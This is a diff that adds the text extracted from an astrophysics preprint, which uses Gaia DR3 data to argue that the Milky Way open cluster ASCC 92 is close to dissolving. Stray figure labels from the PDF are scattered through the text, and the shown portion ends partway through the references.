KdFRT4oBgHgl3EQf0zhG/content/tmp_files/load_file.txt ADDED
The diff for this file is too large to render. See raw diff
 
KtE2T4oBgHgl3EQfpwgn/content/tmp_files/2301.04031v1.pdf.txt ADDED
@@ -0,0 +1,868 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ MNRAS 000, 1–7 (2022)
2
+ Preprint 11 January 2023
3
+ Compiled using MNRAS LATEX style file v3.0
4
+ Catching a Milky Way open cluster in its last breath
5
+ Andr´es E. Piatti1,2⋆
6
+ 1Instituto Interdisciplinario de Ciencias B´asicas (ICB), CONICET-UNCUYO, Padre J. Contreras 1300, M5502JMA, Mendoza, Argentina
7
+ 2Consejo Nacional de Investigaciones Cient´ıficas y T´ecnicas, Godoy Cruz 2290, C1425FQB, Buenos Aires, Argentina
8
+ Accepted XXX. Received YYY; in original form ZZZ
9
+ ABSTRACT
10
+ Theoretical models have suggested peculiar velocity dispersion profiles of star clusters
11
+ facing dissolution. They predicted that, besides bound stars that still belong to the
12
+ star cluster, and unbound ones already stripped off, there is an intermediate popu-
13
+ lation of stars that having acquired the enough energy to escape the cluster are still
14
+ within the cluster Jacobi radius. Both, potential escapers and unbound stars, show
15
+ hot kinematics, not observed along tidal tails of star clusters. We report on the first
16
+ evidence of an open cluster with stars crossing such a transitional scenario, namely:
17
+ ASCC 92. The open cluster gathers nearly 10 percent of its initial total mass, and is
18
+ moving toward Galactic regions affected by higher interstellar absorption. Precisely,
19
+ the obscured appearance of the cluster could have hampered disentangling its true
20
+ internal dynamical evolutionary stage, previously.
21
+ Key words: Galaxy: open clusters and associations: individual: ASCC 92 – methods:
22
+ data analysis
23
+ 1
24
+ INTRODUCTION
25
+ The All-Sky Compiled Catalogue of more than 2.5 million
26
+ stars (ASCC-2.5 Kharchenko 2001) was used by Kharchenko
27
+ et al. (2005) to identify known open clusters. They devel-
28
+ oped an iterative pipeline to be used in that search, which
29
+ they took advantage to discover other 109 new open clus-
30
+ ters. We focus here on ASCC-92, one of those new open
31
+ clusters, that was also discovered from an analysis of the
32
+ Tycho 2 catalogue (Høg 2000) and the Digitized Sky Survey
33
+ (DSS) plates, and named Alessi 31 (Alessi et al. 2003; Kron-
34
+ berger et al. 2006). The cluster was also named MWSC 2723
35
+ by Kharchenko et al. (2012). Surprisingly, the cross-match
36
+ of the cluster names was performed for the first time very
37
+ recently by Liu & Pang (2019). Indeed, there have been sev-
38
+ eral studies on the cluster without acknowledging those that
39
+ relies on different cluster names.
40
+ ASCC-92 caught our attention while analyzing it from
41
+ the Gaia DR3 (Gaia Collaboration et al. 2016; Babusiaux
42
+ et al. 2022) database, because some of the derived cluster’s
43
+ properties hinted at, as far as we are aware, to be the first
44
+ observed star cluster confirming the theoretical predictions
45
+ by K¨upper et al. (2010). K¨upper et al. (2010) performed a
46
+ comprehensive set of N-body simulations to study the evolu-
47
+ tion of surface density and velocity dispersion profiles of star
48
+ clusters as a function of time until cluster dissolution. They
49
+ modelled clusters for an interval of 4 Gyr, if they did not dis-
50
+ ⋆ E-mail: andres.piatti@unc.edu.ar
51
+ solve before reaching this age. without stellar evolution and
52
+ without primordial binaries. They found that potential esca-
53
+ pers - stars energetically unbound located inside the Jacobi
54
+ radius (rJ) - are more numerous than bound stars at dis-
55
+ tances from the cluster centre >∼ 0.5×rJ, and that beyond
56
+ ∼ 0.7×rJ they compose nearly the whole cluster population.
57
+ They also showed from the fit of nearly 104 computed sur-
58
+ face density profiles that it is possible to derive reliable rJ
59
+ values using King models for extended clusters on nearly cir-
60
+ cular orbits, and that by including to them three more free
61
+ parameters, it is possible to derive rJ values with an accu-
62
+ racy of 10 per cent for clusters in eccentric orbits. Likewise,
63
+ they studied tidal debris in the cluster’s outskirts and found
64
+ that they are well represented by a power law with slope of
65
+ -4 to -5, while close to apogalacticon it turns significantly
66
+ shallower (≤ -1).
67
+ Numerical simulations of the 3D distribution of stars
68
+ in clusters with tidal tails have been previously developed,
69
+ for instance, by Kharchenko et al. (2009). They have shown
70
+ to provide a satisfactory representation of stars along the
71
+ leading and trailing tails in the Hyades (R¨oser & Schilbach
72
+ 2019a) and Preasepe (R¨oser & Schilbach 2019b), respec-
73
+ tively, uncovered using Gaia data. Likewise, AMUSE (Porte-
74
+ gies Zwart & McMillan 2018, and references therein), an
75
+ astronomical multipurpose software environment that sim-
76
+ ulates the evolution of a Hyades-like cluster on a relistic
77
+ orbit, has been recently used to confirm long tails in the
78
+ Hyades (Jerabkova et al. 2021) discovered from Gaia data,
79
+ while the N-body code PETAR (Wang et al. 2020) com-
80
+ © 2022 The Authors
81
+ arXiv:2301.04031v1 [astro-ph.GA] 10 Jan 2023
82
+
83
+ 2
84
+ Andr´es E. Piatti
85
+ bined with GALPY (Bovy 2015), was employed by Wang &
86
+ Jerabkova (2021) to study the long-term evolution of young
87
+ open clusters and their tidal streams. As can be seen, the
88
+ simulations by K¨upper et al. (2010) stands out in the sense
89
+ that they predict a particular stage in the cluster internal
90
+ dynamical evolution, rather than the existence of tidal tails.
91
+ In this work, we carried out a thorough analysis of
92
+ ASCC 92 not easy handled open cluster. We discovered that
93
+ it is entering into an interstellar cloud and, more impor-
94
+ tantly, it is facing its last breath before total disruption.
95
+ As far as we are aware, there were not studied open clus-
96
+ ters cautch in such a final evolutionary stage. Moreover, the
97
+ present results provide the first evidence confirming theoreti-
98
+ cal speculations on the bound/unbound conditions of cluster
99
+ stars from the analysis of their total energies. In Section 2 we
100
+ describe our analysis and derive the cluster fundamental pa-
101
+ rameters, while in Section 3 we discuss the obtained results
102
+ to the light of previous studies on the cluster and uncover
103
+ the real disrupting cluster stage. Section 4 summarizes the
104
+ main conclusions of this work.
105
+ 2
106
+ DATA ANALYSIS
107
+ Machine learning techniques have become a powerful tool for
108
+ discovering new open clusters using large databases (Hunt
109
+ & Reffert 2021; Jaehnig et al. 2021; Hao et al. 2022; Castro-
110
+ Ginard et al. 2022). We tried to recognize star members of
111
+ ASCC 92 using the widely recommended HDBSCAN (Hi-
112
+ erarchical Density-Based Spatial Clustering of Applications
113
+ with Noise, Campello et al. 2013) Gaussian mixture model
114
+ technique (Hunt & Reffert 2021). Cluster stars were recov-
115
+ ered after extensively trying with different groups of search-
116
+ ing variables on the Gaia DR3 (Gaia Collaboration et al.
117
+ 2016; Babusiaux et al. 2022) database. Indeed, we firstly
118
+ used only positions (RA, Dec.) as searching variables, and
119
+ did not have success in identifying the bulk of the clus-
120
+ ters members. With the aim of improving the clustering
121
+ search, we then included proper motions, and the results
122
+ did not improve the previous performance. We then con-
123
+ strained the search to stars located inside a circle of 50′
124
+ centred on the cluster, G < 18 mag, and proper motion cen-
125
+ tred on (pmra,pmdec) = (-1.18,-4.15) mas/yr and within a
126
+ circle of 0.4 mas/yr. Having the cluster area and, particu-
127
+ larly, the proper motions constrained for a successful clus-
128
+ tering search, HDBSCAN carried out a satisfactory search.
129
+ The outcome of the position-proper motion driven search
130
+ is shown in Fig. 1. As can be seen, the resulting cluster
131
+ colour-magnitude diagram (CMD) is affected by differential
132
+ reddening.
133
+ Recently, Cantat-Gaudin et al. (2018) recovered the
134
+ largest number of cluster members identified up to date,
135
+ 185, using the Unsupervised Photometric Membership As-
136
+ signment in Stellar Clusters (UPMASK Krone-Martins &
137
+ Moitinho 2014) on Gaia DR2 data. We provide a compar-
138
+ ison analysis between their results and the present ones in
139
+ the Appendix. However, we refer the reader to the study
140
+ of Hunt & Reffert (2021), who carried out a sound com-
141
+ parison of the performance of different clustering searching
142
+ algorithms, and described advantages and disadvantages of
143
+ them.
144
+ We used different Milky Way reddening map models
145
+ through the GALExtin1 interface (Amˆores et al. 2021) to
146
+ obtain the mean interstellar reddening along the line of sight
147
+ of the cluster, and surprisingly realised of the wide range of
148
+ mean E(B −V ) values retrieved, namely, 1.09 mag (Schlegel
149
+ et al. 1998); 0.28 mag (Drimmel et al. 2003); 0.15-1.83 mag
150
+ (Amˆores & L´epine 2005); 4.9 mag (Marshall et al. 2006); 1.05
151
+ mag (Planck Collaboration et al. 2014); 1.11 mag (Schlafly
152
+ et al. 2014); and 0.67 mag (Chen et al. 2019), respectively.
153
+ Since the reddening maps of Chen et al. (2019) were built
154
+ specifically for Gaia bandpasses, and have better spatial res-
155
+ olution 6 arcmin than other reddening maps, we adopted
156
+ them for interpolating individual reddening values for the
157
+ selected cluster stars with membership probabilities P > 70
158
+ percent and corrected their G magnitudes and BP − RP
159
+ colours using the total to selective absorption ratios given
160
+ by Chen et al. (2019). The absorption uncertainties (σ(AG)
161
+ span from 0.003 up to 0.020 mag, with an average of 0.010
162
+ mag at any AG interval.) The reddening corrected cluster
163
+ CMD is shown in Fig. 2, with stars coloured according to
164
+ their E(B − V ) values. Note that the spatial resolution of
165
+ the reddening map allowed the detection of differential red-
166
+ dening (see Fig. 1).
167
+ In order to derive the cluster age and metallicity we fit-
168
+ ted theoretical isochrones computed by Bressan et al. (2012,
169
+ PARSEC v1.2S2) and the Automated Stellar Cluster Anal-
170
+ ysis code (ASteCA, Perren et al. 2015). which explored the
171
+ parameter space of synthetic CMDs through the minimiza-
172
+ tion of the likelihood function defined by Tremmel et al.
173
+ (2013, the Poisson likelihood ratio (eq. 10)) using a paral-
174
+ lel tempering Bayesian MCMC algorithm, and the optimal
175
+ binning Knuth (2018)’s method. Uncertainties in the result-
176
+ ing age and metallicity were estimated from the standard
177
+ bootstrap method described in Efron (1982). While running
178
+ ASteCA, we used the mean cluster distance obtained from
179
+ the cluster member stars’ parallaxes. ASCC 92 turned out
180
+ to be a Hyades-like aged open cluster with a solar metal con-
181
+ tent. Table 1 lists all the derived parameters, while Fig. 2
182
+ illustrates the matching performance of an isochrone with
183
+ the derived age and metallicity of ASCC 92. Table 1 aslo
184
+ summarizes the different works carried out on the cluster
185
+ under different cluster names, for comparison purposes.
186
+ From Gaia DR3 coordinates, proper motions, paral-
187
+ laxes, and radial velocities of cluster members, we com-
188
+ puted Galactic coordinates (X, Y, Z) and space velocities
189
+ (VX, VY , VZ) employing the Astropy3 package (Astropy Col-
190
+ laboration et al. 2013, 2018), which simply required the in-
191
+ put of Right Ascension, Declination, parallaxes, proper mo-
192
+ tions and radial velocity of each star. We adopted the de-
193
+ fault values for the Galactocentric coordinate frame, namely
194
+ : ICRS coordinates (RA, DEC) of the Galactic centre =
195
+ (266.4051◦, -28.936175◦); Galactocentric distance of the Sun
196
+ = 8.122 kpc, height of the Sun above the Galactic midplane
197
+ = 20.8 pc; and solar motion relative to the Galactic centre =
198
+ (12.9, 245.6, 7.78) km/s. The position of the Sun is assumed
199
+ to be on the X axis of the final, right-handed system. That
200
+ is, the X axis points from the position of the Sun projected
201
+ to the Galactic midplane to the Galactic centre - roughly
202
+ 1 http://www.galextin.org/
203
+ 2 http://stev.oapd.inaf.it/cgi-bin/cmd
204
+ 3 http://www.astropy.org
205
+ MNRAS 000, 1–7 (2022)
206
+
207
+ A disrupting open cluster
208
+ 3
209
+ Table 1. Properties of ASCC-92 (Alessi 31).
210
+ Ref.
211
+ radius
212
+ E(B − V )
213
+ distance
214
+ log(age /yr)
215
+ [Fe/H]
216
+ pmra
217
+ pmdec
218
+ RV
219
+ (arcmin)
220
+ (mag)
221
+ (pc)
222
+ (dex)
223
+ (mas/yr)
224
+ (mas/yr)
225
+ (km/s)
226
+ ASCC-92
227
+ 1
228
+ 18
229
+ 0.25
230
+ 650
231
+ 9.01
232
+ -7.68±0.49
233
+ -4.91±0.59
234
+ 2
235
+ 13.4
236
+ 0.312
237
+ 644
238
+ 9.08
239
+ -6.63±0.33
240
+ -5,53±0.33
241
+ 3
242
+ 22.7
243
+ 678±20
244
+ 8.54±0.02
245
+ 0.25
246
+ -1.157±0.306
247
+ -4.115±0.280
248
+ Alessi 31
249
+ 4
250
+ -5.29±3.78
251
+ -2.16±4.67
252
+ 5
253
+ -5.26±5.45
254
+ -2.20±6.52
255
+ 6,7,8
256
+ 0.56
257
+ 663.9±1.5
258
+ 8.38
259
+ -1.164±0.225
260
+ -4.122±0.206
261
+ 5.36±1.95
262
+ 9
263
+ 0.45-0.92
264
+ 676.0±10.0
265
+ 8.85±0.05
266
+ 0.00±0.10
267
+ -1.153±0.128
268
+ -4.201±0.115
269
+ 0.98±9.81
270
+ Ref.: (1) Kharchenko et al. (2005); (2) Kharchenko et al. (2013); (3) Liu & Pang (2019); (4) Dias et al. (2014); (5) Sampedro et al.
271
+ (2017); (6) Cantat-Gaudin et al. (2018); (7) Soubiran et al. (2018); (8) Cantat-Gaudin et al. (2020); (9) this work.
272
+ Figure 1. Relationships of astrometric and photometric parameters of stars in the field of ASCC 92. Points are from Gaia DR3, and those
273
+ coloured according to the cluster membership probability P colour scale, are stars selected by HDBSCAN. Coloured symbols’ size in top
274
+ panels is proportional to the star brightness.
275
+ MNRAS 000, 1–7 (2022)
276
+
277
+ 25
278
+ (mas/yr)
279
+ 4.0
280
+ Dec.)
281
+ 0
282
+ A(De
283
+ 4.2
284
+ -25
285
+ 4.4
286
+ -50
287
+ 25
288
+ 0
289
+ -25
290
+ -50
291
+ -1.4
292
+ -1.2
293
+ -1.0
294
+ A(R.A.)xcos(Dec.)()
295
+ μ (mas/yr)
296
+ 1.8
297
+ 10.0
298
+ (sew)
299
+ 1.6
300
+ 6
301
+ 12.5
302
+ (ma)
303
+ B 1.4
304
+ G
305
+ 15.0
306
+ 1.2
307
+ 17.5
308
+ 12
309
+ 14
310
+ 16
311
+ 18
312
+ 1
313
+ 2
314
+ m
315
+ G (mag)
316
+ BP-RP(mag)
317
+ 0
318
+ 20
319
+ 40
320
+ 60
321
+ 80
322
+ 100
323
+ P (%)4
324
+ Andr´es E. Piatti
325
+ Figure 2.
326
+ CMD of stars with cluster membership probabilities
327
+ P > 70 percent in the field of ASCC 92 according to HDBSCAN,
328
+ coloured according to the individual E(B − V ) reddening values.
329
+ Solid and dashed lines correspond to theoretical isochrones with
330
+ a solar metallicity and log(t /yr) = 8.85 and 8.45, respectively.
331
+ towards (l,b)= (0◦,0◦). The Y axis points roughly towards
332
+ Galactic longitude l=90◦, and the Z axis points roughly to-
333
+ wards the North Galactic Pole (b=90◦). Gaia Collaboration
334
+ et al. (2022) extensively analysed the uncertainties in the
335
+ Galactic coordinates as a function of the heliocentric dis-
336
+ tance for stars with radial velocity measurements and found
337
+ that at the ASCC 92 distance the relative errors are less than
338
+ 1.5 per cent. The spatial distribution of the cluster stars is
339
+ depicted in Fig. 3, where they were on purpose coloured
340
+ according to their individual E(B − V ) values, aiming at
341
+ rebuilding the 3D reddening map.
342
+ As for the space velocity components, they were trans-
343
+ formed to the Vφ, Vθ, and Vr spherical components, and
344
+ from them we computed the 3D dispersion velocity and
345
+ anisotropy β, following the prescription described in Pi-
346
+ atti (2019). We obtained eight 3D dispersion velocity and
347
+ anisotropy profiles, respectively, using distance intervals of
348
+ 1.0, 1.5, 2.0, 2.5, 3.0, 3.5, 4.0 and 4.5 pc, where we calculated
349
+ the values of these parameters. Then, we obtained the mean
350
+ values and standard dispersions (error bars) as a function of
351
+ the distance to the cluster centre (R) depicted in Fig. 3.
352
+ 3
353
+ RESULTS AND DISCUSSION
354
+ 3.1
355
+ Cluster’s fundamental parameters
356
+ Thanks to the stringent Gaia DR3 data sets selection crite-
357
+ ria applied (see a comprehensive overview in Hunt & Ref-
358
+ fert 2021), we identified by visual inspection in the vector
359
+ point diagram cluster stars tightly gathered around pmra
360
+ and pmdec values that resulted to be fair first guesses of the
361
+ derived mean cluster proper motion, in excellent agreement
362
+ with recent accurate estimates (Cantat-Gaudin et al. 2018;
363
+ Soubiran et al. 2018; Cantat-Gaudin et al. 2020). Because
364
+ of the highly variable reddening across the cluster field the
365
+ combination of proper motions and parallaxes resulted to be
366
+ a key strategic search procedure, that allowed us to recover
367
+ the spatial distribution of cluster’s stars. Whenever sky po-
368
+ sitions were used as HDBSCAN searching variables, we did
369
+ not recover any clustering signature in the phase-space used.
370
+ This means that genuine clustering detection is not always
371
+ guaranteed by enlarging the number of searching variables
372
+ (e.g. position, motion, photometry).
373
+ Previous works on ASCC 92 did not report the exis-
374
+ tence of variable interstellar absorption along the cluster line
375
+ of sight, which we found it spans the E(B − V ) range from
376
+ 0.45 mag to 0.92 mag. We speculate with the possibility that
377
+ previous age cluster estimates based on theoretical isochrone
378
+ fit to the cluster CMD obtained much younger ages because
379
+ of this effect. We superimposed, for comparison purposes,
380
+ an isochrone of log(t /yr) = 8.45 (the average age estimate
381
+ from Liu & Pang (2019) and Cantat-Gaudin et al. (2020)),
382
+ which confirms that ASCC 92 is not such a younger cluster.
383
+ That younger isochrone seems to better reproduce the ob-
384
+ served cluster CMD of Fig. 1. Likewise, cluster ages larger
385
+ than 1 Gyr (see Table 1) could be affected by field star con-
386
+ tamination.
387
+ 3.2
388
+ Cluster’s motion
389
+ The mean cluster space velocity turned out to be (VX, VY ,
390
+ VZ) = (16.8, 232.9, 9.4) km/s, which shows that ASCC 92
391
+ is mainly moving following the rotation of the Milky Way. If
392
+ we drew the star velocity vectors in Fig. 3, we would see that
393
+ the respective arrows are nearly pointing parallel to the Y
394
+ axis. According to the space distribution of E(B−V ) values,
395
+ it would seem that ASCC 92 is moving toward a direction
396
+ of increasing interstellar absorption. From Fig. 2, we esti-
397
+ mated that E(B − V ) varies ∼ 0.2 mag in 5 pc. By using
398
+ E(B−V ) = N/(5.8×1021 atoms/cm2 per mag) (Bohlin et al.
399
+ 1978), we got an HI column density of 1.16×1021 atoms/cm2,
400
+ which along the 5 pc gives a space density of 75 atoms/cm3.
401
+ This is a diffuse cloud density, or a density for the edge of a
402
+ molecular cloud. The juxtaposition of the cluster next to a
403
+ moderate density gas cloud might be expected if the cluster
404
+ were young (age < 100 Myr), since the gas could be from
405
+ the GMC where it formed. Chen et al. (2020, and references
406
+ therein) compiled a large catalogue of molecular clouds with
407
+ accurate distances within 4 kpc of the Milky Way disc. We
408
+ did not find any molecular cloud that matches the ASCC 92
409
+ locus, and did not find any expected motion signatures in
410
+ the distribution of the space velocity vectors that accounts
411
+ for a collision of the cluster with a molecular cloud. There-
412
+ fore, a plausible interpretation could be that ASCC 92 is
413
+ entering a more obscure region of the Milky Way disc.
414
+ 3.3
415
+ Cluster’s internal kinematic
416
+ We analysed the cluster internal kinematics and found that
417
+ there is no signature of expansion along its major axis, which
418
+ is contained mainly in the (X, Y ) plane, nor any expected
419
+ pattern driven by Milky Way tidal forces (Meingast et al.
420
+ 2021). As can be seen in Fig. 3 (right panel), the cluster’s
421
+ stars motion is isotropic from ∼ 6 pc outwards from the clus-
422
+ ter centre, which means that there is no privileged direction
423
+ of motion. Cluster stars placed in the inner ∼ 5 pc show
424
+ the expected decreasing velocity dispersion profile of bound
425
+ stars, while the velocity dispersion increases outwards. Such
426
+ MNRAS 000, 1–7 (2022)
427
+
428
+ 8
429
+ 0.80
430
+ 0.75
431
+ 10
432
+ 0.70
433
+ 12
434
+ 0.65
435
+ R
436
+ 0.60
437
+ 14
438
+ 0.55
439
+ 0.50
440
+ 16
441
+ 0.0
442
+ 0.5
443
+ 1.0
444
+ 1.5
445
+ (BP -RP)oA disrupting open cluster
446
+ 5
447
+ Figure 3. Left panel: Spatial distribution of cluster members in the Galactic (X, Y, Z) framework from the perspective of the cluster
448
+ centre. Symbol size is proportional to the star brightness, colored according to the individual E(B − V ) values. Right panel: Derived 3D
449
+ velocity dispersion (top) and anisotropy (bottom) for cluster members as a function of the distance to the cluster centre.
450
+ a peculiar behaviour was predicted by K¨upper et al. (2010)
451
+ and, as far as we are aware, it has not been observed until
452
+ now.
453
+ With the aim of verifying such a theoretical result, we
454
+ computed the critical energy a star needs to escape the clus-
455
+ ter and its total energy. For the calculation we used equa-
456
+ tions 13 and 14 of K¨upper et al. (2010), adopting a Milky
457
+ Way mass enclosed inside the cluster Galactocentric distance
458
+ (7.66 kpc) of (1.0±0.2)×1011M⊙ (Bird et al. 2022). An up-
459
+ per cluster mass was calculated from the cluster mass func-
460
+ tion built from stars with membership probabilities > 70 per
461
+ cent. We obtained the individual masses by interpolation in
462
+ the adopted PARSEC v1.2S isochrone. We then fitted the
463
+ resulting mass function with a Kroupa (2002)’s profile. Fig. 4
464
+ shows the resulting mass function, with points and error bars
465
+ representing the average and corresponding standard devi-
466
+ ations of five mass functions built using mass intervals of
467
+ log(M/M⊙) = 0.05 up to 0.30, in steps of 0.05. We finally
468
+ integrated the fitted Kroupa (2002)’s mass function from the
469
+ maximum observed mass down to 0.5M⊙. The upper cluster
470
+ mass turned out to be 580 M⊙. We used alternatively ASteCA
471
+ (see Sect. 2) for the construction of a large number of syn-
472
+ thetic CMDs from which it finds the one which best resem-
473
+ bles the observed CMD. Thus, the star cluster present mass
474
+ and the binary fraction associated to that best representa-
475
+ tive generated synthetic CMD are adopted as the best-fitted
476
+ star cluster properties. ASteCA generates synthetic CMDs by
477
+ adopting the initial mass function given by Kroupa (2002)
478
+ and a minimum mass ratio for the generation of binaries
479
+ of 0.5. The total observed star cluster mass and its binary
480
+ fraction were set in the ranges 100-5000 M⊙ and 0.0-0.5, re-
481
+ spectively. We derived a cluster mass of 566±110M⊙ with
482
+ a binary fraction of 0.40±0.06, in excellent agreement with
483
+ the above mass estimate.
484
+ Fig. 5 shows the difference between the total and the
485
+ critical star energy as a function of the distance to the cluster
486
+ centre. The vertical line represents the derived rJ value (9.3
487
+ pc). As can be seen, stars located at R < 5 pc are bound
488
+ stars, in excellent agreement with the 3D velocity dispersion
489
+ profile and calculated cluster anisotropy. Stars beyond rJ are
490
+ Figure 4. Cluster mass function built using stars with membership
491
+ probabilities > 70 per cent (see text for details). The red line
492
+ represents the fitted Kroupa (2002)’s mass function.
493
+ unbound stars, which show a hot kinematics, while those
494
+ located at 5 < R (pc) < 9.3 are the stars that will next
495
+ escape the cluster. We added the masses of stars enclosed
496
+ within rJ, which resulted to be 56M⊙, nearly 10 percent of
497
+ the upper cluster mass limit. This outcome suggests that
498
+ ASCC 92 is facing its last breath.
499
+ 4
500
+ CONCLUSIONS
501
+ We used Gaia DR3 data to thoroughly analyse ASCC 92, a
502
+ Milky Way open cluster with somewhat discrepant parame-
503
+ ters in the literature. The analysis of the Gaia data resulted
504
+ challenging while trying to employ the recommended Hierar-
505
+ chical Density-Based Spatial Clustering of Applications with
506
+ Noise, because the cluster is projected toward a region af-
507
+ fected by noticeable differential reddening. Such a variable
508
+ obscure appearance of ASCC 92 caused that clustering in
509
+ MNRAS 000, 1–7 (2022)
510
+
511
+ 5
512
+ 0.8
513
+ B-V)
514
+ d
515
+ N
516
+ 0.6 E
517
+ 5
518
+ 10
519
+ 5
520
+ 0
521
+ O
522
+ 10
523
+ -10
524
+ 0
525
+ 10
526
+ 20
527
+ -5
528
+ 0
529
+ 5
530
+ X (pc)
531
+ Z (pc) (km/s)
532
+ 5
533
+ 03D
534
+ 0
535
+ 1.0
536
+ 0.5
537
+ B
538
+ 0.0
539
+ -0.5
540
+ 2
541
+ 3
542
+ 4
543
+ 5678910
544
+ 20
545
+ R (pc)1.6
546
+ 1.4
547
+ M
548
+ log
549
+ 1.0
550
+ 0.8
551
+ 0.05
552
+ 0.10
553
+ 0.15
554
+ 0.20
555
+ 0.25
556
+ 0.30
557
+ 0.35
558
+ log(M/M。)6
559
+ Andr´es E. Piatti
560
+ Figure 5. Relationship between the difference of total to critical
561
+ star energy versus distance to the cluster centre. The vertical
562
+ line represent the rJ. Symbols are coloured according to the star
563
+ masses.
564
+ the stellar distribution in the sky is not evident. Therefore,
565
+ by using positions as clustering searching variables, we ar-
566
+ rived to an unsatisfactory number of identification of cluster
567
+ members. By imposing some constraints, namely, a limited
568
+ region of the searchable area, mean proper motions and dis-
569
+ persion in very good agreement with reliable estimates, we
570
+ identified 171 stars with similar parallaxes that clearly stand
571
+ out in the sky as an stellar aggregate. Differential redden-
572
+ ing has not been used in previous analyses of the cluster’s
573
+ CMD. This made the evolved region of the cluster Main Se-
574
+ quence, and particularly, the Main Sequence turnoff, appear
575
+ blurred. With the appropriate correction for differential red-
576
+ dening, we obtained a cluster age 710 Myr older than recent
577
+ estimates using Gaia data 240 Myr. The isochrone corre-
578
+ sponding to the cluster age matches satisfactorily well the
579
+ cluster Main Sequence along ∼ 7 mag.
580
+ We also studied the cluster internal dynamical evolution
581
+ and found that ASCC 92, while moving nearly in the Milky
582
+ Way disc following Galactic rotation, does not show any sig-
583
+ nature of internal expansion, rotation, or both combined. Its
584
+ 3D velocity dispersion profile and anisotropy reveal that in-
585
+ nermost cluster members move following the expected kine-
586
+ matics of bound stars, while those in the cluster outskirts
587
+ show an isotropic kinematic behaviour, like unbound stars.
588
+ ASCC 92 shows a kinematic transition region of increas-
589
+ ing velocity dispersion and anisotropy of bound stars. These
590
+ stars have the necessary energy to leave the cluster, but they
591
+ are still within its boundaries. This peculiarity was predicted
592
+ from N-body simulations by K¨upper et al. (2010). As fas as
593
+ we are aware, ASCC 92 is the first studied clusters showing
594
+ evidence of being populated by these kinematically peculiar
595
+ stars.
596
+ ACKNOWLEDGEMENTS
597
+ I thank Enrico Vesperini, Bruce Elmegreen and Pavel
598
+ Kroupa for insightful comments and suggestions. I thank
599
+ the referee for the thorough reading of the manuscript and
600
+ timely suggestions to improve it.
601
+ This work has made use of data from the European
602
+ Space Agency (ESA) mission Gaia (https://www.cosmos.
603
+ esa.int/gaia), processed by the Gaia Data Processing and
604
+ Analysis Consortium (DPAC, https://www.cosmos.esa.
605
+ int/web/gaia/dpac/consortium). Funding for the DPAC
606
+ has been provided by national institutions, in particular the
607
+ institutions participating in the Gaia Multilateral Agree-
608
+ ment.
609
+ This research made use of Astropy, a community-
610
+ developed core Python package for Astronomy.
611
+ 5
612
+ DATA AVAILABILITY
613
+ Data used in this work are available upon request to the
614
+ author.
615
+ REFERENCES
616
+ Alessi B. S., Moitinho A., Dias W. S., 2003, A&A, 410, 565
617
+ Amˆores E. B., L´epine J. R. D., 2005, AJ, 130, 659
618
+ Amˆores E. B., et al., 2021, MNRAS, 508, 1788
619
+ Astropy Collaboration et al., 2013, A&A, 558, A33
620
+ Astropy Collaboration et al., 2018, AJ, 156, 123
621
+ Babusiaux C., et al., 2022, arXiv e-prints, p. arXiv:2206.05989
622
+ Bird S. A., et al., 2022, MNRAS,
623
+ Bohlin R. C., Savage B. D., Drake J. F., 1978, ApJ, 224, 132
624
+ Bovy J., 2015, ApJS, 216, 29
